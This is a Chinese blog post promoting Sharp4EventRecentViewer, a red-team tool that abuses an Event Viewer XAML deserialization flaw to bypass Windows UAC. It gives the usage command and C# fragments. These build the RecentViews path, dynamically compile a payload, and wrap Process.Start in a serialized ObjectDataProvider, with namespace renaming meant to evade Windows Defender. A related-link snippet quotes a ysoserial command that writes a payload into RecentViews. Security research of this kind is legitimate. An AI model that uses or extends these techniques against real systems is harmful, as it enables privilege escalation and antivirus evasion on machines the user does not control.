.NET 一款事件查看器反序列化漏洞绕过UAC的工具

最新推荐文章于 2024-10-26 08:30:00 发布
最新推荐文章于 2024-10-26 08:30:00 发布
阅读量389 收藏 4
点赞数 5
CC 4.0 BY-SA版权
文章标签: .net 安全 网络 web安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ahhacker86/article/details/142845831

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4EventRecentViewer是一款红队常用的UAC绕过工具,利用Windows事件查看器的反序列化漏洞,来实现系统命令执行和UAC绕过。本文将详细介绍该工具的使用方式、代码实现,以及其在红队渗透测试中的实际应用。

图片

03使用方法

在执行Sharp4EventRecentViewer时,只需提供需要执行的命令行参数。例如:

Sharp4EventRecentViewer.exe cmd.exe

工具会自动生成的恶意载荷文件并写入到事件查看器的RecentViews路径。如下图所示。

图片

然后工具自动化模拟用户打开事件查看器,完成触发反序列化漏洞,启动新的CMD进程命令。如下图所示。

图片

04原理解析

以下是工具的关键代码部分解析,工具首先检查事件查看器的RecentViews文件夹是否存在,并确定该路径为目标路径。

string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Microsoft", "Event Viewer", "RecentViews");
Console.WriteLine("Checking if the path \"{0}\" exists...", path);

通过Environment.GetFolderPath方法获取用户的本地应用数据文件夹,再结合Path.Combine方法确定Event Viewer\RecentViews的完整路径。

随后,使用C#代码动态编译一个恶意的可执行文件,其中包含了CreateProcess API调用,用于执行系统命令:

CSharpCodeProvider codeProvider = new CSharpCodeProvider();
CompilerParameters parameters = new CompilerParameters();
parameters.GenerateExecutable = true;
parameters.OutputAssembly = Path.Combine(Path.GetTempPath(), "StartInSelectedDesktop.exe");

string sourceCode = "..."; // 恶意代码(包含CreateProcess调用)
codeProvider.CompileAssemblyFromSource(parameters, new string[] { sourceCode });

此处,利用动态编译功能允许生成随时变更的恶意载荷,提高了工具的灵活性和隐蔽性。之后,工具生成了ObjectDataProvider对象,并将其序列化为XAML字符串

ObjectDataProvider provider = new ObjectDataProvider
{
    MethodName = "Start",
    ObjectInstance = new Process { StartInfo = new ProcessStartInfo { FileName = outputAssembly } }
};

StringBuilder sb = new StringBuilder();
XmlWriterSettings settings = new XmlWriterSettings { Indent = true };
using (XmlWriter writer = XmlWriter.Create(sb, settings))
{
    XamlWriter.Save(provider, writer);
}
string xaml = sb.ToString();
xaml = xaml.Replace("xmlns:sd", "xmlns:sf").Replace("<sd:", "<sf:").Replace("</sd:", "</sf:");

此处,ObjectDataProvider类被用来封装恶意Process对象,将Start方法作为序列化执行目标。通过对XAML文件内容中的sd命名空间进行修改,进一步绕过Windows Defender的检测。当事件查看器加载该文件时,会通过反序列化漏洞执行恶意命令,实现UAC绕过,执行payload。

综上,Sharp4EventRecentViewer充分利用了Windows事件查看器的反序列化漏洞,具备强大的UAC绕过能力。在红队渗透测试中,该工具因其高度隐蔽性和无文件特性而受到广泛应用。

05.NET安全知识库

图片

图片

星球文化20+个专题栏目涵盖了点、线、面、体等知识面!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

图片

[网络安全自学篇] 九十四.《Windows黑客编程技术详解》之提权技术(令牌权限提升和Bypass UAC
杨秀璋的专栏
09-12 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充相关知识点。第六篇文章主要介绍木马病毒提权技术,包括进程访问令牌权限提升和Bypass UAC,希望对您有所帮助。
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
.NET Framework漏洞(CVE-2017-8759)复现及后续渗透
sanc7ane的博客
02-25 7812
参考:!bhdresh 简介 CVE-2017-8759是一个新型的Office文档高级威胁攻击漏洞,该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码。FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本。黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net...
.NET Core 开源库被曝漏洞,可使恶意软件逃避检测,无补丁
smellycat000的专栏
07-06 1506
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队.NET Core库中存在一个漏洞,可导致恶意程序躲避安全软件的检测。该漏洞是由微软 .NET Core 库中的一个路径遍...
.NET高级代码审计(第一课)XmlSerializer反序列漏洞
zls365365的博客
06-04 832
0X00 前言在.NET 框架中的 XmlSerializer 类是一种很棒的工具,它是将高度结构化的 XML 数据映射为 .NET 对象。XmlSerializer类在程序中通过单个 API 调用来执行 XML 文档和对象之间的转换。转换的映射规则在 .NET 类中通过元数据属性来表示,如果程序开发人员使用Type类的静态方法获取外界数据,并调用Deserialize反...
.net1.1的“漏洞”--杀手级的啊
净心编程
12-31 1699
今天在lake2的专栏里看到一贴,原文如下:“.net暗藏杀机?document.title=".net暗藏杀机? - "+document.title     有一回写了个VB.net的小程序,拿去放在空间上,然后用IE访问它(http://xxxx/x.exe)没想到程序居然直接运行了。原来当你的系统装了.net framework之后IE遇到.net程序就会自动执行而不是下载它。  
WEB攻防-.NET特性常见漏洞
weixin_45534587的博客
04-25 1669
C#编译成DLL或EXE文件:C#编写的代码在编译时会生成DLL或EXE文件,这些文件包含MSIL代码。.NET提供运行时环境:.NET框架的CLR提供运行时环境,负责将MSIL代码编译成机器码并执行。DLL文件是.NET程序集:在.NET中,DLL文件是程序集的一种形式,它包含可由多个应用程序共享的代码。因此,C#、.NET和DLL文件之间的关系是:C#编写的代码编译成包含MSIL代码的DLL或EXE文件,这些文件在.NET框架的CLR运行时环境中执行。
.NET内网实战:通过白名单文件反序列化漏洞绕过UAC
最新发布
ahhacker86的专栏
10-26 856
在渗透测试和红队活动中,权限提升是重要的一环,尤其是在没有管理员权限的情况下执行更高权限的操作。有一种思路利用 Windows 事件查看器 eventvwr.msc 的高权限加载特性和 XAML 反序列化机制,以绕过 UAC 限制。
如何创建低权限的标准用户权限进程?
dvlinker的技术专栏
06-09 173
如何创建低权限的标准用户权限进程?
[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
热门推荐
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
.NET配置文件的10大安全漏洞
weixin_30615767的博客
03-11 172
在ASP.NET应用程序在生产环境中部署时,需要检查Web.Config文件是否存在以下10个不正确的配置,可能导致安全漏洞: 1、Disabling custom errors Vulnerable: Secure: <configuration> ...
干货 | 最新Windows事件查看器.NET反序列化漏洞分析
zls365365的博客
06-02 572
0x01 漏洞背景4月26日@Orange Tsai 在Twitter上发表一个有关Windows事件查看器反序列化漏洞,可以用来绕过Windows Defender或者ByPass UAC等其它攻击场景,Orange视频里也给出了攻击载荷 DataSet“ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c ca...
最新Windows事件查看器.NET反序列化漏洞复现与分析
Brucetg的博客
04-30 2658
0x01. 漏洞描述 4月26日在twitter上看到Orange师傅发布了个windows事件查看器.Net 反序列化漏洞,感觉有点意思,故抽空简单做个复现与分析。 0x02. 漏洞复现 测试环境:Windows 11,ARM版 作者给的payload: ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c calc > %LOCALAPPDATA%\Microsoft\Eventv~1\RecentViews 其中,%LOCALAP
.net 跨站脚本攻击(XSS)漏洞的解决方案
笨笨鸟吃柠檬的专栏
09-06 8350
1.跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行。一般用来盗取浏览器cookie 2.跨站脚本攻击漏洞,英文名称Cross Site Scripting,简称CSS又叫XSS。它指的是恶意攻击者向Web页面中插入一段恶意代码,当用户浏览该页面时,嵌入到Web页面中的恶意代码就会被执行,从而达到恶意攻击者的特殊目的。 危害...
ASP.NET时代的安全漏洞及其解决办法
weixin_33834075的博客
06-08 290
ASP.NET常见安全问题 一、SQL语句漏洞 许多程序员在用sql语句进行用户密码验证时是通过一个类似这样的语句来实现的: Sql="Select * from 用户表 where 姓名 = '" + name + "' and 密码 = '" + password + "'" 通过分析可以发现,上述语句存在着致命的漏洞。当我们在用户名称中输入下面的字符串时:test' or '1'...
网络安全】记一次项目中如何快速定位.net漏洞
HBohan的博客
04-13 588
一、寻找源码 通过询问管理员知道是个开源的系统,但是管理员并不确定具体的信息,就需要我们自己去寻找版权 首页信息查看源代码,根据页面关键字去某fa搜索,确定"/templates/web/netschool/corescripts/verify.js" 搜出来的相同站点比较多,根据案例里的连接挨个访问,在某个站底部发现版权为某厦商学院学习平台,知道版权就很容易找到源码了。 二、快速审计技巧 由于我不懂.net 所以审计只能靠一些简单技巧泛泛的寻找, 确定路由结构 【查看相关资料】 1、网络安全学习路线
ASP.NET安全漏洞
dbjtimve93993的博客
05-21 744
ASP.NET安全漏洞[原文发表地址]:Important: ASP.NET Security Vulnerability[原文发表时间]:2010/9/18 4:23 AM几个小时前,我们发布了一个关于ASP.NET安全漏洞的Microsoft 安全警告,该漏洞存在于目前所有的ASP.NET版本。该漏洞是在上周五的一个安全会议上发现的。我们建议所有的客户立即采取补救措施(见下文)来预...
.net 漏洞处理方法总结
laokaizzz的专栏
07-11 1751
漏洞:SQL注入、SQL盲注 解决方法:1、pages标签加validateRequest="false"属性,如果是.NET 4.0以上,还要在httpRuntime标签加requestValidationMode="2.0"属性;2、httpRuntime标签加requestPathInvalidCharacters=""属性;设置了以上属性后,网站要对URL里面的内容和FORM里面的内容做
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

dot.Net安全矩阵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值